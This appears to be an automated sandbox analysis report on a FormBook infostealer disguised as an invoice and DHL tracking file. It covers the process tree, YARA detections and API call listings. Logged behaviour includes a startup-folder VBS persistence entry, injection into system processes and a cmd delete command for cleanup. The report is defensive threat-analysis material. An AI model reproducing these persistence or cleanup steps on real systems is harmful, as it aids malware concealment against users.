Description: unknown, Source: 00000005.00000002.2683608489.0000000003640000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2683608489.0000000003640000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2683608489.0000000003640000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2682364766.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2682364766.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2682364766.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2682364766.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2682364766.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	01:41:16
Start date:	08/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Windows\SysWOW64\svchost.exe"
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	01:41:16
Start date:	08/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	01:41:21
Start date:	08/08/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Imagebase:	0x7ff7f4f40000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	01:41:21
Start date:	08/08/2024
Path:	C:\Users\user\AppData\Local\directory\name.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\directory\name.exe"
Imagebase:	0x620000
File size:	1'145'344 bytes
MD5 hash:	6BBFDED2BAA5A18CC97D10516EE91C78
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1590633261.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1590633261.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1590633261.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1590633261.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1590633261.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	01:41:22
Start date:	08/08/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\directory\name.exe"
Imagebase:	0xfc0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.1626007911.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1626007911.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.1626007911.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.1626007911.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.1626007911.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.1626065993.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1626065993.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.1626065993.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.1626065993.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.1626065993.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.1625529448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1625529448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.1625529448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.1625529448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.1625529448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	01:41:23
Start date:	08/08/2024
Path:	C:\Windows\SysWOW64\mstsc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\mstsc.exe"
Imagebase:	0x910000
File size:	1'264'640 bytes
MD5 hash:	EA4A02BE14C405327EEBA8D9AD2BD42C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1635324999.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.1635324999.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1635324999.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1635324999.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1635324999.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	01:42:36
Start date:	08/08/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 4084 -s 7332
Imagebase:	0x7ff743850000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	01:42:38
Start date:	08/08/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	explorer.exe
Imagebase:	0x7ff62d7d0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	4.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	49

Executed Functions

Function 004042DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0040430D

Part of subcall function 00406B57: _wcslen.LIBCMT ref: 00406B6A

GetCurrentProcess.KERNEL32(?,0049CB64,00000000,?,?), ref: 00404422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00404429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00404454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00404474
FreeLibrary.KERNEL32(00000000,?,?), ref: 0040447B
GetSystemInfo.KERNEL32(?,?,?), ref: 004044A0

Strings

|O, xrefs: 004436F8
GetNativeSystemInfo, xrefs: 00404460
kernel32.dll, xrefs: 0040444F

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 4793c8f21a9c9181553e3ecf3aeeacc2caea5ab6ebcc57d422027d341fcf7de5
Instruction ID: f2db94d72f8a0dd2313c2dbe6fb09547a999aedd017194ba44beff19de37ffa5
Opcode Fuzzy Hash: 4793c8f21a9c9181553e3ecf3aeeacc2caea5ab6ebcc57d422027d341fcf7de5
Instruction Fuzzy Hash: 1AA1B6A190B2D0FFF711CB69BC815957FA5AB76700B1844BBDC81A3B72D2384515CB2E

Function 004042A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,004050AA,?,?,00000000,00000000), ref: 004042B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,004050AA,?,?,00000000,00000000), ref: 004042C9
LoadResource.KERNEL32(?,00000000,?,?,004050AA,?,?,00000000,00000000,?,?,?,?,?,?,00404F20), ref: 004435BE
SizeofResource.KERNEL32(?,00000000,?,?,004050AA,?,?,00000000,00000000,?,?,?,?,?,?,00404F20), ref: 004435D3
LockResource.KERNEL32(004050AA,?,?,004050AA,?,?,00000000,00000000,?,?,?,?,?,?,00404F20,?), ref: 004435E6

Strings

SCRIPT, xrefs: 004042BF

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: bd63ab4ad02e2fe76dd7d434f9685d8d36af1090133f144fb2420f10bad9b318
Instruction ID: 7b141b112ae088f56cf646199b51eb6980b8c393c86a64e8297b8a0f16958f52
Opcode Fuzzy Hash: bd63ab4ad02e2fe76dd7d434f9685d8d36af1090133f144fb2420f10bad9b318
Instruction Fuzzy Hash: 96117CB0600700BFEB218B65DC88F277BB9EBD5B91F2041BEF502D6290DB71E8008675

Function 00442BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00402B6B

Part of subcall function 00403A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004D1418,?,00402E7F,?,?,?,00000000), ref: 00403A78

Part of subcall function 00409CB3: _wcslen.LIBCMT ref: 00409CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,004C2224), ref: 00442C10
ShellExecuteW.SHELL32(00000000,?,?,004C2224), ref: 00442C17

Strings

runas, xrefs: 00442C0B

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: 8711b03bad58fbf001bbbb1bd4b9a1a7383c7480468d1113a5630f37fe68491f
Instruction ID: f5f6d1560cde91b349b40d05329fa9bcbf1412b573ea30ffcf12cb2e0bd517e4
Opcode Fuzzy Hash: 8711b03bad58fbf001bbbb1bd4b9a1a7383c7480468d1113a5630f37fe68491f
Instruction Fuzzy Hash: 4C1102312082416AC704FF61D996A7E7BA8AB90749F44443FB842221E3CF7C9A49C71E

Function 0046DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00445222), ref: 0046DBCE
GetFileAttributesW.KERNELBASE(?), ref: 0046DBDD
FindFirstFileW.KERNELBASE(?,?), ref: 0046DBEE
FindClose.KERNEL32(00000000), ref: 0046DBFA

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 6fa4ac448b5ec19a81878dd5603f9d89d54fa5849c42d184b22fb049997efb24
Instruction ID: 70a6eeb17e27ba3ac066058be58d8c683c8c8675871e312be0d5d0824ac0dfae
Opcode Fuzzy Hash: 6fa4ac448b5ec19a81878dd5603f9d89d54fa5849c42d184b22fb049997efb24
Instruction Fuzzy Hash: 24F0A030C1091857C220AB78AC4D8AB376C9E01334B544763F836C21E0FBB5599586DE

Function 0040BF40 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON

Download Yara Rule

Strings

p#M, xrefs: 004507CE

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: BuffCharUpper
String ID: p#M
API String ID: 3964851224-494205710
Opcode ID: 339de113143bcef8867d4aa9bc588418efb953771b861a93d22c6c8e319bf0b5
Instruction ID: 3e22cf882efccef595a0682dd0d20a6a23e92b948fe06f8badcd25310555a476
Opcode Fuzzy Hash: 339de113143bcef8867d4aa9bc588418efb953771b861a93d22c6c8e319bf0b5
Instruction Fuzzy Hash: 67A26B74608301DFD720DF15C480B6AB7E1BF89304F14896EE89A9B392D779EC45CB9A

Function 0040D730 Relevance: 21.6, APIs: 14, Instructions: 627windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 0040D807
timeGetTime.WINMM ref: 0040DA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0040DB28
TranslateMessage.USER32(?), ref: 0040DB7B
DispatchMessageW.USER32(?), ref: 0040DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0040DB9F
Sleep.KERNEL32(0000000A), ref: 0040DBB1

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: d3befa091f829e130a76d381ef6f034ce7dcc538745c69d4743ef4194e0aa367
Instruction ID: 4c09e840e3574fd92d1257d7f9367f6878cad7d9768aa2736193bcb7d24aef7f
Opcode Fuzzy Hash: d3befa091f829e130a76d381ef6f034ce7dcc538745c69d4743ef4194e0aa367
Instruction Fuzzy Hash: 7342E270A04241AFD725CF64C984BAAB7E0BF46304F14456FE855973E2D7B8E84DCB8A

Function 00402CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00402D07
RegisterClassExW.USER32(00000030), ref: 00402D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00402D42
InitCommonControlsEx.COMCTL32(?), ref: 00402D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00402D6F
LoadIconW.USER32(000000A9), ref: 00402D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00402D94

Strings

TaskbarCreated, xrefs: 00402D37
AutoIt v3 GUI, xrefs: 00402D23
0, xrefs: 00402CE9
+, xrefs: 00402CF0

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: cd8d14c0ebef9928fdd3d13a22045c689fd9971fe87f714c84563d368b3f35de
Instruction ID: 68500bc772f0f6273025a355d775a2daaef7a78e7c89274bad8ffdcdfee80e8b
Opcode Fuzzy Hash: cd8d14c0ebef9928fdd3d13a22045c689fd9971fe87f714c84563d368b3f35de
Instruction Fuzzy Hash: A021C5B5912219AFEB00DFE4E899BDDBBB4FB08700F10817BF911A62A0D7B54544CF99

Function 00438D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.B, xrefs: 0043903A, 00438FD0, 00438FF2

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID: .B
API String ID: 0-829718130
Opcode ID: 1a429c879d0e0c11a062f5037e8e0557d84ca674edd92bd5450c4b7a15ab3dcd
Instruction ID: ba4d2f9f1d6b6df295ecb80300e5698ac04355b15020690fa3d2e25e92e1a355
Opcode Fuzzy Hash: 1a429c879d0e0c11a062f5037e8e0557d84ca674edd92bd5450c4b7a15ab3dcd
Instruction Fuzzy Hash: 69C1E274A04349AFCB159FA9D841BAEBBB0AF0D310F1450AFF414A7392C7798D41CB69

Function 0044065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0044039A: CreateFileW.KERNELBASE(00000000,00000000,?,00440704,?,?,00000000,?,00440704,00000000,0000000C), ref: 004403B7

GetLastError.KERNEL32 ref: 0044076F
__dosmaperr.LIBCMT ref: 00440776
GetFileType.KERNELBASE(00000000), ref: 00440782
GetLastError.KERNEL32 ref: 0044078C
__dosmaperr.LIBCMT ref: 00440795
CloseHandle.KERNEL32(00000000), ref: 004407B5
CloseHandle.KERNEL32(?), ref: 004408FF
GetLastError.KERNEL32 ref: 00440931
__dosmaperr.LIBCMT ref: 00440938

Strings

H, xrefs: 004408BD

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 7e821adffe91cbc9713f8d52b49a87b3260336805fc21dec40f5ae5b36cdbdbf
Instruction ID: 0e080a019c9861a23bdbb9aa90aa9b2b7a8dbc6c0bc5328ec41012dbdd50e36c
Opcode Fuzzy Hash: 7e821adffe91cbc9713f8d52b49a87b3260336805fc21dec40f5ae5b36cdbdbf
Instruction Fuzzy Hash: C8A11832A041148FEF19AF68D851BAE7BB0EB06324F14016FF915DB391D7399D22CB99

Function 0040344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00403A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004D1418,?,00402E7F,?,?,?,00000000), ref: 00403A78

Part of subcall function 00403357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00403379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0040356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0044318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 004431CE
RegCloseKey.ADVAPI32(?), ref: 00443210
_wcslen.LIBCMT ref: 00443277
_wcslen.LIBCMT ref: 00443286

Strings

Include, xrefs: 00443184, 004431C5
\, xrefs: 0044328C
\Include\, xrefs: 00403527
Software\AutoIt v3\AutoIt, xrefs: 00403560

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 47612595baf8e8967cb60742a8425c4d553e9cd10144ccd1f6134466858df5b7
Instruction ID: 6b06cd0ec7865beb68f8dca776b2102844a6d920aa240daec9c92be3ad86e6c7
Opcode Fuzzy Hash: 47612595baf8e8967cb60742a8425c4d553e9cd10144ccd1f6134466858df5b7
Instruction Fuzzy Hash: 4B719C715053009ED304EF66ED8195BBBE8FFA5744F40443FF945932A0DBB89A48CB69

Function 00402B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00402B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00402B9D
LoadIconW.USER32(00000063), ref: 00402BB3
LoadIconW.USER32(000000A4), ref: 00402BC5
